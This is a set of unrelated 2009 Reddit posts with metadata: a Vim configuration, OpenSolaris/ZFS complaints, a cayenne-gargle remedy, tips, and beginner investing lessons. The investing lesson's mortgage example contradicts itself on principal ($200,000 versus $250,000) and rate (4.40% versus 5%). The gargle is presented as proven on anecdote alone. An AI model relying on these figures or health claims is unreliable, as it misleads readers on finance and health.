I was using rlslog.org, but it really has seemed to go down hill over the past year. Anyone have any other blogs they follow scene releases with? | r/p2p | post | r/p2p | 2009-09-03 | Z0FBQUFBQm5IcUlYWW5Tdk5UTzg0R1hzQjRXMV80NFBVM1VhWlhtUzFWdUtuczNQRWNGR21kU3JDYVN6ekc1eHJiaXFhU0x6NGlQY2ZPNGxzZVNmb3FPSDhncjI0RlpncWc9PQ== | Z0FBQUFBQm5IcUowdDMxZG1NS0JfNFlBZHVfRFUtbmpDOXpaNDR0dGMzTGNxOEIzODJZOW5PTHNTRVdBOHd6SUlxQjQxQktLNlFwZ2tqOWdvNElUM1ZoYVRuWjVvcWk2dHRtLUJ1c2FULTZkbmFnaXRYamRzMGFuT3F6ODVsb3lrSlo5N3cwdVBRd2RLMkYySHdUbUdELWpMSnZtVWdFemgzSTNvd1VNT2lubWFwZjQxSjdXR01JPQ== |
Joan C. Nordbotten - Elementary information retrieval in frames for your "conveniance"
edit: added link
| r/csbooks | post | r/csbooks | 2009-09-08 | Z0FBQUFBQm5IcUlYZGdNRU1NODB3X2x6OFBwaXEwM21JQURRQ05qMkFJYzJFd3hCZnpDSTVLS1o0RW1OUHU2OE5ESDlxRzZaMm1rR2JpTEdYUG50UFlXOWl0ZHB1Q2xVWGc9PQ== | Z0FBQUFBQm5IcUowX3IzZTFoSVowYTV0TXVhMXNscE1kdWNiM1NOWGVjZm5nOXg5Z2o3aVJDT3JEeVFWck5Wa0I3TlJzTjBMM2NkSi1xSkNlMTZOX05QY1E2dXdvdVJZNGxzX09vbTRrUk9JSkltM2lseDJSUm42SWR6cnpuanNXb1JKcXlDVlBpUW9HMEsySVVXcWhhWTJ3MXRaZTRqQ3dXOTN0dS1Rc3JLcDdwUEpxeVVmTmo3TW5tcENPLTRCdVJsYm54Rk4yQ1d1 |
" Use Vim settings, rather then Vi settings (much better!). ::
" This must be first, because it changes other options as a side effect. ::
set nocompatible
"Preferred colors for terminal vim ::
" Don't write backup file if vim is being called by "crontab -e"
au BufWrite /tmp/crontab.* set nowritebackup
" Don't write backup file if vim is being called by "chpass"
au BufWrite /etc/pw.* set nowritebackup
" GUI Options ::
if has('gui_running')
menu 20.451 &Edit.Choose\ Color\ Theme :SCROLL<CR>
menu Plugin.Zoom\ Window :ZoomWin<CR>
menu Plugin.Browse\ Undo\ Branches :UB<CR>
menu Plugin.Create\ Color\ Scheme :ColorSchemeEditor<CR>
menu Plugin.Color\ Picker.Hex\ Color\ Picker :PickHEX<CR>
menu Plugin.Color\ Picker.HSL\ Color\ Picker :PickHSL<CR>
menu Plugin.Color\ Picker.RGB\ Color\ Picker :PickRGB<CR>
menu Plugin.Color\ Picker.Raw\ Color\ Picker :PickRAW<CR>
menu Plugin.Toggle\ Easy\ Accents :EZA<CR>
set showtabline=1
set guioptions+=b
"set guioptions-=T
set anti gfn=Bitstream\ Vera\ Sans\ Mono\ 12
colorscheme lucius
set cursorline cursorcolumn " Show cursor position visually, like BBEdit
colorscheme elflord
" A few extra settings I like (^_^) ::
au BufWinLeave ?* mkview " Load folds and such
au BufWinEnter ?* silent loadview " - so I can navigate confusing code better.
filetype plugin indent on
syntax on
" Options ::
set number nowrap nobackup visualbell backspace=2 " Options I always, always use
set showmatch matchpairs+=<:> "Show matching parens & brackets.
set mouse=a mousemodel=popup" In many terminal emulators the mouse works just fine, thus, enable it.
set autoindent smartindent " Indent-related options
set softtabstop=4 shiftwidth=4 expandtab
set enc=utf-8 "Needed for gtk
set foldcolumn=1
set nohlsearch ignorecase incsearch smartcase " Search-related options
set showcmd showmode " display incomplete commands
set lazyredraw "faster macros
set scrolloff=3 "more context
set laststatus=2 shortmess=a statusline=%<%04n\ %t%(\ %m%r%y[%{&ff}][%{&fenc}]\ \ %{mode()}%)\ %a%=\ col\ %v\ \ line\ %l/%L\ %p%%
set tabpagemax=1000000 "up to a million tabs!
set title "in mrxvt or xterm, let the terminal have the title be the same as it would be in gvim.
set ul=1000000000 "undo up to a billion changes!
set viminfo='25,<10000,n~/.viminfo directory=~/.vim/swp
set virtualedit=all
set wcm=<Tab> wildmenu wildmode=list:full
" Variables ::
let html_use_css=1
let mapleader = ','
"Some settings for plugins I like to use.
let g:GPGPreferArmor=1
let MRU_File="~/.vim/.mru"
let MRU_Max_Entries=20
let NERDShutUp=1
let Tlist_Ctags_Cmd = '/usr/bin/ctags'
" Keymaps ::
" Make undo branch navigation commands easier on the wrists
noremap <F9> g-
noremap <F10> g+
" Use arrow keys for scrolling
noremap <down> <C-e>
noremap <up> <C-y>
" A little correction ;)
map q: :q
" Macros - to be added and deleted when useful ::
| r/dotfiles | post | r/dotfiles | 2009-09-14 | Z0FBQUFBQm5IcUlYRVVfcjRjQ2tTQU50ZHdLXzJCLVB2ZEpkTXF5a1BrS2YzaS1WSFE3OGFxTUxLemUxTEJqWm5CQnlDTmJIZHVQLTd6R0JTRDAwU0d3dGxZQ3BLNWlGc1E9PQ== | Z0FBQUFBQm5IcUowMGRJLTgtTmRqeldiME9HQy1vZmNPODRrSnlvcmQxNE53N3FLd05PT2xxak9JYkZzNi1SNTdzSlZQT1NWbUpaVWgzS3hNU05Dcnp3YnZHWFlPOVhTeVpkdUVfZ1BqaHRaTXBqcDROX1Z1ekpac29hbnBoZXFIdUk3aEFHV2R1aXV2ZXFJbG9YWUQwMHgzT3NYOEdIcExhMzVWUDE0ZUloZlhrNlVRdVM3MFEydERWM1F0ZlFxZGxYVm1pNmpKWmhu |
I think it's farther than you can imagine. | r/astro | comment | r/astro | 2009-09-15 | Z0FBQUFBQm5IcUlYYUtGV0g4dUtiMkcwbWRZY0Fpd1pXTXhJM0dhM0YzU2ZzS3Boc2JYWTI0dW5TbDFJczRmZkRjNHVtdFphWEtzczJkNGhPMzRIc09aQWRmR2ctWWhJZkE9PQ== | Z0FBQUFBQm5IcUowb3VhREx0OVdJc3Ftd0wyZC12c3RfU25fRG9aWHk1M1YweVhEUGFoQzRDVXhXanpOaUstY2xjV1J0TGVFcnlYQTNCY0JiNTB0WVNFWVhGUUtFR0YxU0F3LTc4RFNvRUdoVHB5T2F3Z3J2LWxDR0Q3R1BsYzVBV1RpZzN0OFVPUC1zQ0FVYjVzeHZ6SmhSZS1BU1FuRUVmZk0xX01yQ2g3V0dPYktuYWg0XzN4QjV5YkhjVTNIcmtvMlVJUk9ZN3k4ZF90RDRkSldMUXFWTUZGbFZtTXJndz09 |
Some of this may seem a bit esoteric, but I think if your path is peace, you are bound to find some good advice and inspiration here.
There are other translations and commentaries online as well. I found this one through [this page](http://nyima108.blogspot.com/2006/09/bodhicharyavatara-study-resources.html). | r/pacifism | post | r/Pacifism | 2009-09-16 | Z0FBQUFBQm5IcUlYSXVobm5MM21HclAwZnRIaDIzTWtmZXRZdTNtYlBzR19MMlFuSDRyOFhpamNJM1E1UE93NkR3TmdoR2J6elkzN0xrbnhyWnZ6VlQ0NDBqQkNsb0lFLUE9PQ== | Z0FBQUFBQm5IcUowdDZRVVE3eUxMTDVqOEpfTDRiaURIYkUyNjhDLVF6STNodFhjUFBBOUJYTWxlZGItcWR1ZHlNV211VWpWYkdzdS1MX3FhcWZCLTZoWGdOZjJ6cUE5ODQzc3NSVHpsZjFkSzQwMGV1S2VEaTB6blVnMGJ0Wk5ncjVYTkhBTk9jQVJIZk5RY0ZlZFZrOWFlQmFTMXB0TjFtekRHMXZEQmhudXZzNGk1ZGhkY3ZJPQ== |
Let us say, for instance, that you knowingly protest in a way that is nonviolent and yet very antagonistic. You are throwing out slogans that you know will incite others to want to lash out at you, though your slogans may not be particularly violent in and of themselves, does this make you an proactive actor in the ensuing violence of someone inevitably striking you? | r/pacifism | post | r/Pacifism | 2009-09-16 | Z0FBQUFBQm5IcUlYQWVlV2NVUG5jS3NOTXN1Z0hJNTR3cUNVUHRRc2FGcWRIc1ZMbDM3d1c1c1BYYkM5WWlrVkt0cnA2eHBFa2gtNTV4VHNvNnNZcldVTl82Q1BTMFY0dWc9PQ== | Z0FBQUFBQm5IcUowSFRnQ2hRcE5JMFlDc0lJeTI5SnY1Ty1wVkdRelFRS3BUdXVuRG1kM1NMU1VBU19ETkVrVTNfVFdvYVBxRzlmNmhxYVh4bzNpY2psOWFhUXpqNlU2bDVaUU5OSE5IYThnVG9qVEI0anZiTFprQ2k3R3BtVmFtdW5rZFViTDltWk1BOTU5TkVfbkUxWW1QRUduWVMySGR0U28zX1h2Yi1iaDRTczdXWXRzeVFCYjkwUWdQNmdsX0liaklTVjFRQ1paTnNoLVIzSTUweU5Qa3RhVUZOZndMQT09 |
Just recieved this email:
"Dear Friend,
Well, it looks like you have made a difference.
Based upon the unbelievable support that I have receieved from 10,000 supporters like you, I have decided to throw my hat into the ring to challenge Chris Dodd for the honor of representing the state of Connecticut in the United States Senate. I will announce my candidacy on MSNBC's Morning Joe show on Thursday, September 17 at 8:15am eastern time. Sorry for the short notice, but its important to honor commitments and keep these things under raps until the day the news breaks.
At this time last year I could not have imagined that that I would be making such an announcement today. I had never intended to become a candidate for public office. But these are extraordinary times. Our economy is falling apart in front of our eyes and Washington seems intent on making the wheels come off even faster. At a time when we desperately need adult supervison, the economically illiterate are running the show. As I love my country, it now seems clear that I must try to do something to help. The emotional and material support I have received from across the country has made the decision much easier.
So today it begins. As I'm sure you are aware, the rules in politics bear only scant resemblance to those which govern polite society. As a result, I am wading into strange waters, and I'm sure strange things will happen. But I promise to maintain my composure and give it my best shot. Based on the support that I have received thus far, I fully expect to be facing down Chris Dodd in the general election just 14 months from now.
As my campaign takes flight, I appreciate the patience and trust that you have shown. To commit time and money to a long shot candidate for high office is a hard choice. I hope to repay that trust with a first class campaign.
I look forward to your feedback and your continued support.
Thanks again,
Thank you | r/fringescience | post | r/fringescience | 2009-09-18 | Z0FBQUFBQm5IcUlYbTZYcXp5RE13QjN0RU1zSzFEWWtVWEV2ZXgwMUR1WjVuRmkzUWIxZHlIQWlJdVd0RE5oTDJ4NGdmSV9jOGU1VlBxSkw1THU3V0dFSlhvelBoY1ZHQnc9PQ== | Z0FBQUFBQm5IcUowYU1TR21VWFpMdllxalZzdEloaWNZNUc0bnBPbUxEZXQySkdxdHQyOGlmb1lzMEZUVk04bXAwaWJveUhPQkR6UE9LSTcyQnc4VWNfOFBBaEFSQ1VmSGpLUUJvWUppUWVqdUg0X3RGbzV5WThRTVhIN0hlUTdqa0FodFlwYUdULXpZams0MGh5WGlWTXUxY0tBNmZESFFBU1I5UG5QWVVPUTVBcGljTGdfOTVhRkR6Q2JaOTJCb3pMZ1NDU0xwTlZYaTFYelZhX2tNdWdoS2swcXN1RmJ5UT09 |
You know, that guy who talks about a bunch of different things, you know, physics, ancient civilizations, dimensions, consciousness, you know, the structure of vacuum space, fractals, atoms and molecules, you know what I'm saying? 8 hours of "you know, OMG", maybe you just don't remember. You know? | r/fringescience | post | r/fringescience | 2009-09-19 | Z0FBQUFBQm5IcUlYUG56UWRvY051YmRxaXRtQ2FNSUZBTFB6Zkw1QmJJb0lqSkd3c1JhUGxTcjNiMkJsUTZha1VoRWJkekMxeUJ3ZVlwZVJKQmw2aVRnS0UzS0IxYVBkcVE9PQ== | Z0FBQUFBQm5IcUowZVFmRDBfQi1RRGxEN1pubFRzek1Ob1RlLU1rYUhldW9fSTdDd1Y2U0pyWjZGY29ud05iR3pRSWFlbEUyOW5DWks1UWtsZ0RFelN4MXlpMEhjV25BeFFCZnFiVDdCdmg4WDB2RGNZZkd0WWJkWGFKMFdvd0tHRXB0bFZXX25NS2hYVkNIS1VEMnVfOVF2aVRiWkhEZWgzclFtb1VMWWpBWUFjVm9yMTMxQ0JjbHlYQTRiZzIwY2RqSTF1eVpfUFYyNk1WT3hrRU01OEhrOUlNb1dPaEp5dz09 |
I created a small ZFS storage server, and I swear, it's done everything possible to suck as a storage server.
On sending data TO it: As I have the rge driver, given that every NIC under $100 (the price of my mobo and cpu combined) is made by Realtek, I have this annoying bug that kills the network connection every 20-30 gigs of data transfer to the server, whether by SSH, NFS, SMB, or Rsync on any of the above.
Speaking of SMB, aside from how annoying it is to set it "simple" SMB sharing on OpenSolaris, 2009.6 has a bug that kills the SMB server (seriously kills and zombies it, there's no workaround aside from resseting the box as the process refuses to die or restart) if I so much as look at it the wrong way (say, setting up DNS Multicast so that other computers can find it. Accessing it via IP holds steady, but the moment I try its hostname it dies).
All this would be substantially less annoying if I could:
* install a newer dev build via CD
* install newer packages for samba
* upgrade my system to a newer dev build
There's no install CD for a newer snv AFAICT, the packaging system doesn't allow for newer packages beyond snv_111, and my system refuses to upgrade, whether by GUI or command line (using the instructions on the Open Solaris site), each on a _fresh install_. So I'm a little miffed, and the only reason I haven't dropped the whole thing is because ZFS is just _too damn sexy_ to pass up. Errors that would have resulted in a re-install in linux land are a 5-second rollback and a reboot.
But, it's still rather annoying to try getting things working. EXT3 is no good, NTFS is no good for the above mentioned upgrade issues, and the bloody thing didn't even detect **my (50 some odd gig) FAT32 drive**. If it wasn't for rsync I think I would've given up days ago. And I haven't even tried to get the printer networked. Lord help me. Anyhoo, bumps and bruises aside, here's the fix I promised!
Now, whether you're running Nexenta as a zone in Open Solaris or Nexenta itself, [this fix should help you with getting SSH to work properly](http://opensolaris.org/jive/thread.jspa?messageID=419186񦕲).
BIG ASS UPDATE! (as if anyone reads this anymore)
* Network bug fixed via gani driver
* CIFS server still broken, but breaking less often for some reason
* Debian Lenny LX Zone handles FFMPEG and MPD, Nexenta Native Zone handles webserving. OpenSolaris now dedicated to CUPS, CIFS, and NFS.
* Installed SNV_126
* CIFS server fixed, Native zone broken (now waiting for 128, ugh) | r/solaris | post | r/solaris | 2009-09-24 | Z0FBQUFBQm5IcUlYeGRERzc1ZFR1MklodnRVUnVESlNSbjJkQWxPZXhzOWx2eU5LaTB4Nkw3Z0haMGk1V1JUWFhSaW81WU9EUFUxeTFXUDRCWl9wekF0T0h0LVZWdTZQbHc9PQ== | Z0FBQUFBQm5IcUowYkNaWFpSZlVyZDRzNldtUFY4WTA1Uzc3azdNUV9rODRaMTA0RVZMcUFrTjdXSjhlMXdyRTVqUzhSdkpwcjJuV3Byd0lFSGZfZEJGeGZBNGFTV3pQdFNSWXdKODBZenl0YzFBSFZMS2xqeGtEd0EydEx0ZUx6S1FFaWJBR0JMOG5kQ1lWT1V1V0I0LVVyLVF3VHFNODVuV2pRQ1RDZnczMUtsNG5JYWpCcFVDV0U0VHBLUzhpaXF3eW1BUlRZV1UxMVpoSm9pZ29iLVlNYkZUVnRmZGVVQT09 |
I'll upvote it again. I don't care. | r/astro | comment | r/astro | 2009-09-29 | Z0FBQUFBQm5IcUlYdWRaRTdWaTFySFFPalRCMmRDZzh5VGMwanhOTF96ZUhHX2ZzeXV3ejBYa0JWS2RXOWx5amFaZlZZNy1McWdfemRFZjBYSVZwTE51ZldXejBCdVdvdWc9PQ== | Z0FBQUFBQm5IcUowbFdrdklIb3dOWjl5NWp3LXhwR2VrYy1hczJmVXQxMXh5dVhocjh5b2otNkhPLU9WLXE5YlA5QnM3MUZ0T1RvNDBKRHZrdkdrT3I0OGhCYVdaV2ZlWElQcnlpdzFJVjEtUkpoQXZTNUJ4NVA1TVZjN0g1ZEhLSGY4a3AtMHBrdGR3bzdKQnEzOEFOQ3hpbU9scFRlMXVOMUxSRXVvRnhXMElubjV0VG8zOTVaMXlwQ1Z4enpPUXNQQ3Mway1zRndHRERNeHdXNHozeUthS3lpYUs0VjIwdz09 |
Maybe with the Russian Navy patrolling the the waters fewer wizards will escape Abkhazian. | r/worldwidenews | comment | r/WorldWideNews | 2009-09-30 | Z0FBQUFBQm5IcUlYSEhNazhxMFdVWnhZMVN1cHQ4YzJrWFFiZkZYV3YxMjI3blY0UC0zTld6RmNjaHhSQXg4bFlPUGxseFhVMzlVUjBvZzZHSnllSDlFYWJhaU9yUldOSVE9PQ== | Z0FBQUFBQm5IcUowLTlDTVFzakJTeWtnalRwUjF1WV8xV255MXRWMVZMdURRSTFnMHpQTzlwb05GR0cyM3B6YmVRalNzSDllcEJXR1poZDlZYk12SjB6SER2SzNrSnFwQlV0dHhfV1laMjVfdS1fLWJYQmRGbGlCTHJUcmlxN3ljU0NWTUF3QWNJSXBidzI2OW53UDRoQVU5Ry1PX21QT3o5ZUNIUUdoNTMxZE5IbVhiam1VT082bTY0Y0JkcTRKU2NPMS1PckVuQ0NyVWpDTWViS3duOUxVcm1hU2RxN09MUT09 |
hey all, i am familiar with "traditional" database design and am intrigued by this whole nosql movement and was wondering if there were any use cases "out there" that can help me understand when/where a nosql/kvp structure would be more appropriate than a normalized db approach.
thanks in advance | r/nosql | post | r/nosql | 2009-10-06 | Z0FBQUFBQm5IcUlYNjNEcVVyNDI5NXFISzJ4bXU4cXRsU19QNmZDV3pyb2VzQklYV3RPdVBVdzVrTlRrcXl1X2stM2ZUTnVOQzFQeHF3RVRWZGdZWDN1Y29QWGxWcFVScmc9PQ== | Z0FBQUFBQm5IcUowZi1VdFZWeW1PWWFoU0tvb2xVaElYU2dweFpoaThib3g4S3dHX3ZaV1QyaTVnNFh5dmNfOVNFZWRXQm5yazNqSl9XOFZHM2l3VEVIV1ZJcVU5YU90RDhjbkpQRnZzV2ZfbTFOU0VhWk9mbHFYdWtlSlNHWlcyTnhCS2dOS1NteHJsM2NzcXVSWmVIRGYtdElBd0E0Tkpuci1NVGRJYjdMWG5YdnNoVDY3c05rPQ== |
I read this online, and can personally attest to the effectiveness of it.
All you need is some cayenne powder or cayenne pepper, but cayenne pepper makes you want to sneeze and isn't ideal.
Get some warm water in a cup, mix in a couple pinchs of cayenne powder. Mix it up well. Gargle, and MAKE SURE YOU CLOSE YOUR EYES. If any stray splash gets in your eyes, it WILL sting.
You can spit it out or swallow, it doesn't really matter. Repeat until you gargled the whole cup. Try not to let it touch your tongue too much, its very hot.
The reason this works is because capsaicin, found in peppers, is a strong anti-inflammatory.
| r/tipoftheday | post | r/tipoftheday | 2009-10-18 | Z0FBQUFBQm5IcUlYRXp0amptVjFiWkd2dTlHc2N2X2VpczhSeURzNlJtZG1ieHpXQW9ORUpOMDk0NmctenN6UTV5Vm9iZ3dGYl9raUE0NWpfSEFkYnZLRnJrTm9JcWxxaFE9PQ== | Z0FBQUFBQm5IcUowOTR2WU9nZ0dEVjZ2aEk3UGFFeWxDaXJHN0xwQnpWclNPNmZPMUJxcHd6Q0F0bG43d1o3OGpjdWZwYkE4TlB3N3B4MllxYWxqR0J2dWhpaFBRWFdUb3U1Q19Zc21RTndya2FPMjBfRF9BZGd3SWNuaV90QnUzaXBxN0J4V1RzblcwaVU0VnVKNDJtVWhjTjJRa0FZV3NVVWdtU3MyVTZ6YldwNFFEV05TeHVDbTV3bU80V05tQWMwSDlwUnAwX2Fm |
Just like it says on the can- take two fingers, and pinch the bottom (non-stem) end of the banana. The skin should split, and be very easy to peel. | r/tipoftheday | post | r/tipoftheday | 2009-10-18 | Z0FBQUFBQm5IcUlYQzVzWWlWUTNJWWRDTEQzZW5SOHFTMW82Q2lRaDQ1NHNxaVMzVkJVVnhvWGJRZ0MtLVhDWUdYWS1va1pxYk5IYkdLQ0tZLU90NHVKenJDQkVzcV9ZNHc9PQ== | Z0FBQUFBQm5IcUowVDZMMnBjdm5CMFRrSUNrbFpndjZxZkVMTzBncmNGMHNUNmpNT2pyOUwyMU1Ta0JrUGlNNGU0aERJaEZlUG5xQ3N6SE5HMGFCbDl1THFhQmRRMnJBZWtGRF81ak56WV9EY1NVMk9zM08xLV8yQ29vdzFYOE1zS0RZeDJoYUJ5Y1YwLS0tNkFoQzJhdmE0ck90Ukg2LTlDc1BDWnU4bHlYY2RvOG1YVnVBTTA1aG9MZmhVZHBYVkg0d01ibGVLdlNXNjVTLWtVcjhRUktES1Z2b3lpUzYzZz09 |
When I speak with Chinese or Indian printers they always tell me that they know of printers using child labor, but they swear that their particular shop does not. Everyone is innocent in prison. What, you don't believe it? Just ask them. They also tell me that it isn't their fault. People would die if they didn't get the pittance they are paid. American companies demand cheap prices, so Americans are to blame. | r/print | post | r/print | 2009-10-19 | Z0FBQUFBQm5IcUlYRDZTbGpBMEIzWGNJelVWcEVoZUJPRWozbEE1dFhQNnlFZU5jbE5meE5zTk01bXNIVi03SGR5TmtETmIyNVpuLUFzYXdPTzEyaVNXb0Z5cVg2TXFoaFE9PQ== | Z0FBQUFBQm5IcUowN1pfOEtkc1NmUzV3N1J2YVhiYzdCUUFPY1MzajdLWlNkRmVvd1BHQUtrVUZqbkdjaUZBSlRxenR1aGhPTWs1NDVnV2NQUWo3ekJMeURoN0lKTG90RWRjV0JHb3ptc0g4VEVPR0pEVVFSZ1BoSHF2RzJaOTRrUkJ1NEVCSGRUQXQyZlB1OXhtTVFkZ2w4OERtZEprYUcwUzJOXzNjcWxBSUxSSVF2eW9iLTJtNzN4RG16ZnhLNVpuTmVFN01TZ2NE |
I made this reddit 8 months ago so I could add my p2p finds for myself and now it has grown up to 300 users :)
I want to thank all of you who have contributed to /r/p2p and those who are new here.
I would appreciate if you guys/gals have any feedback or want something added.
What is money...
People use it everyday, but few can relate to what it really is.
Most people will answer it's a piece of paper used to buy something, at sometimes. But money can be spent using a credit card, so this definition is flawed.
Theorically, money doesn't exist - it's an illusion.**If every business on the earth decided to stop accepting the American Dollars, then every American Dollars you own would be worthless** Understanding the nature of money is critical to understanding returns, inflation and much more.
Money is, simply said, a convenience. It's an opportunity to buy something later. Money can only be used for one thing: buying. You might a computer. You might buy a mutual fund. Even if you keep your money under your bed, **You are in reality buying something - speculating that the cost of life will go down (deflation) and you are better off keeping your money under the bed (for example, you could believe banks will go under and lose your money)**
Now that we understood what money is, we must understand another important concept: the time nature of money. If I give you a number such as "5", it is uni-dimensional. 5 will always be 5, years later. But money is not like that.
**Would you rather have $5 today in $5 in ten years?** Of course, you would prefer it now for a few reasons.
The first is the risk. The cash you have today is certain. You can get it today, and have it in your hands right now. The second is the most important concept of financial mathematics - you can use the money now.
Not being able to use your money for a certain amount of time is the most critical concept of investment. Every time you invest, you renounce to the right to use your money for a certain amount of time.
To compensate for this inconvenience, one earns interests. Instead of using your money to buy something now - food, computer, iPod - you invest it.
So, money has two dimensions: amount, and time. To be exact, whenever money moves from a party to another (i.e. you buy something at the grocery, you buy Apple shares) you create what is called a CASH FLOW. A cash flow is whenever money moves from a party to another.
A cash flow has two dimensions: amount, and time. $5 given to you today is worth less than $5 given to you in two years. But even this has a limit. Would you rather have $5 now, or $500 in 2 months (from a reliable-paying party)?
What allows money to move in time - i.e. $5 now or in two months - is interest. Using interest, you can move a cash flow through time.
If the interest rate is 10%, then $5 today is worth $5 * (1+10%) = $5.50 in a year. Receiving $5 now or $5.50 in a year is the same to you. You should be indifferent to either option. How we came up with the 10% is an entirely different story.
The last important concept of this chapter is the concept of present value. Let's give an example. Let's say you buy a car. You can pay $25,000 now or $1,000 per year forever, starting next year, at an interest rate of 4%. Which option would you choose?
Now that easy. To solve this problem, we need to use Taylor sum. In the first option, you have to pay $25,000 now (a negative cash flow right now), which has a present value of -25,000$. In the second option, you have to pay $1,000 forever.
You will pay $1,000 in a year, $1,000 in two years, $1,000 in three years, etc. If you think too quickly, you might think you're better off paying it all now than taking a debt all your life, but that is not the question for now (we assume people are logical).
The value of the second option is : 1000 * (1/1,04) [actualized by one year at 1,04; check out how I can with it] + 1000 *(1/1,04)^2 [actualized two years] + 1000 * (1/1,04)^3+...
...Until the end of time. This is an infinite, geometrical series, which is solved mathematically by 1000* (1/0,04). If you do the math, the option 2 is worth... $25,000.
It follows that both options - paying $25,000 now or $1,000 per year forever - are equivalent.
An equivalent way to see it would be to see it like this: instead of giving $25,000 to the car dealer, you place it in a bank account paying 4% per year. Each time, you receive $25,000*(0,04) in interest, which you give to the dealer.
This lesson is simple, but critical to understand most bonds and financial products, especially with an infinite horizon. Understanding interest rates can save you a lot of money when shopping.
Later on, we will see the many weaknesses of this model. Why should the 4% be constant forever? What interest rate do we use? What if there are fees (mortgage fees, etc)? What about the risk from both parties
In the preceding example, we have looked at a financial product that was paid forever, called a perpetuity. However, most product have a limited paying period.
Let's take a 25-years mortgage of $200,000. How does the bank calculate your monthly payments?
The solution is extremely simple; this is an annuity for people with no background in finance. An annuity, simply said, is a sum of cash flows with a different time (paid at a different period). The solution is very simple, thanks to geometrical series. You calculate the present value of $200,000 now (obviously 200,000) and the present value of 1$ paid every year for 25 years. Obviously, you will pay more than $1, but that is your unknown in the equation. Everything else is known. Overall, it looks like this:
$250,000 = X * [1- [1/(1+i)]^n]/i
Where X is the monthly payment, i the interest rate (assumed constant) (let's take a 4.40% five years fixed mortgage) and n the number of years (25)
X = $17738.11432
It follows that by paying $17738.11 per year for 25 years, at 5% interest rate, you paid off your mortgage. This option has the same value as paying $250,000 right now.
By the way, this is REALLY how banks calculate your mortgage, except that it's paid monthly (we can convert the annual interest rate to monthly) and that there might be some fees, and that the interest rate will vary **Bonus: how can we calculate new payment if the interest rate changes?** *(ANSWER: You calculate the value of your loan just BEFORE the interest rate change, then the value of the "new" mortgage at the new interest rate, with the period of time remaining)*
Look for interest rate modelling part I for more advanced concepts on this matter.
| r/investing101 | post | r/Investing101 | 2009-10-20 | Z0FBQUFBQm5IcUlYLTNqelMyUnhLM2dLUjZvSXdOSHdqSHJINTZDU1JhS0d2a09KcXRxSTNCbmMwWksxSVBMYXdKNXhtMFNMNUR2cWhGTUxoRXU4ZXZzZW1OZmhJS3JqekE9PQ== | Z0FBQUFBQm5IcUowZ1pDOVlET29LSHhxZnBqS2tzelhmWGhmR2Nnc0E1c2tYa0twYVpLckgtb2VUNVM1bWxOUXoyQWpKVG1WbGc5emdDWmJHOFlEaENGSG1zX2N6NS13MG9lM1UzSEFvYmxyX0dHSmNaMWFtcFFZMHhwOGthdTdpMXh6bVBlTUJ3TzB5UzQ2d2daYnhrUk9iZFc5T05CTmZOYUMxd2ZlZmhYUWg5WTMzMmVQM0FXRlpyM09MVHN2bUJ1OFNEMVRwaVNfYzlPMF9EVk1pd1ZScm1VZ0E4YUlyZz09 |
In this short part, we will look at the majority of products you can invest in. This is no NO WAY an exhaustive list; in fact, if you were millionaire, you could very well "invent" a new product. However the products below resuem 99% of actively traded items.
The most obvious are **stocks**. When you buy a stock, you **buy a share of the company and of its future profits**. At the most simple level, this is exactly what buying a share is. Stockholders own the company and not the opposite. If you have a company and go public, even if you're the CEO, you do not OWN the company anymore (unless you own 50%+1 stock of the company, we will see why later).
Stocks are the instruments you will invest in the most UNLESS you specialized in another field since they are so simple, relatively low-risk and have no expiration value. If your grand-mother had bought 10 coca-cola shares in 1945 and forgotten about it, they would still be valid today.
There is much to be said on shares. One important concept is the concept of **dividend**. Dividends are cash OR stocks that are given to shareholders. Not all stocks pay dividends. The dividends theory is vast and complex and will be checked in Part 3.
Another one is the concept of split / reversal. When a stock splits, your number of shares increases. If you have 10 shares and the company does a 10:1 split, you now own 100, magically! However, this does not increase the value of the as, you guessed it, the stocks will go down 90%. Miller and Modigliani were the first to bring this theory up. The reverse operation is a reverse split; 10 shares become 1. We will see later that stocks usually increase after a split, and decrease after a reverse split, due to market psychology (part 3)
The last concept we will talk about is the buybacks. A company may buyback its shares - or a competitor might buy the company by buying 50% +1 shares (see this like an election; if you own 50% + 1 votes, and there are only 2 options (yes or no) you effectively control every vote and thus the company). Buybacks always increase the value of the stocks UNLESS they are below market value; usually, buybacks will be much above the market value.
One last concept: *if you are certain a company is going up, you buy the stock. But if you think it is going down, what do you do?* You **short** the stock. This concept is very important. By shorting the stock, you BORROW the stock from someone who already holds it and sell it, with the promise of buying it later, preferably at a lower price. With stocks, the maximum you can lose is 100% of your investment; in a bankruptcy. With shorting, there is no limit to what you can lose. If you short the stock at $100 and it goes to $1,000, you just lost $900 per share! Shorting is very dangerous, although very lucrative. The best scenario in a shorting is if the stock reaches 0, where the money you got by selling short the stock is entirely yours.
Stocks really deserve their own chapters; however, this is a rough introduction to the subject.
**Options** There are many times as more options traded as stocks. Options are extremely popular product.
With an option, you buy/sell the right to buy a stock later at a fixed price. A call is the OPTION (not the obligation) to buy Google at $500 at any time by november 22, for example.
Options are very complex. The most-traded options are calls and puts - options to buy at a fixed price, and option to sell at a fixed price. There are two types of calls/puts: european and american. European options can only be exerciced at a fixed date; american options can be exerciced at any time until the fixed date. **AFTER THIS FIXED DATE, THE OPTIONS ARE WORTHLESS**
So far we have checked companies. What if you want to invest in gold, or oil? Since the stock market is electronic, buying the gold and having it kept somewhere is not possible (it is possible through a bank) since stock markets do not have vault. If you want to invest in commodities, you could buy companies that hold a large amount of that commodities, but this is risky, and can cost a lot.
In a future - another type of derivative product, similar to a forward - you buy the OBLIGATION to buy a product at a fixed date, at a fixed price. You are FORCED to buy oil at $80 a barrel on november 22. Naturally, not everyone wants to take physical delivery of the commodity; most of the time, the futures is settled by cash.
Futures are settled every day; every day, one party pays the other. If you bought a future and the price of the item went down, you pay the other party.
Forex is for currency exchange. You buy or sell a pair of currency - USD/CAN for example. In this example, you BUY USD by SELLING CAN.
**Futures options**
Options we saw above, but applied to futures and not stocks. Stock futures exist too.
Bonds are exactly what we saw in chapter one. Simply said, it's a debt that pays X% per year, the yield. It might not pay anything until expiration (zero-coupon) but usually, it will pay semi-annual coupons.
**Mutual Funds**
A funds that holds many products. For smaller investor, mutual funds allow a diversification. If you have $1,000 for example, you cannot buy a diversified portfolio at a resonable cost. Mutual funds are simply pools where everyone chips money in, to invest in a particular field (china stocks, energy, banks, USA...). In my opinion, mutual funds charge a lot and 90% of mutual funds do worse than the stock market.
You won't trade a SWAP, although it pays to know what it is. A SWAP is another derivative product whereas two parties exchange payment. One will agree to pay a fixed cost, another will agree to pay a variable cost (for example).
Stocks traded on the stock market, similar to Mutual Funds, allowing exposition to a more focused product (Oil ETF, Gold ETF, etc)
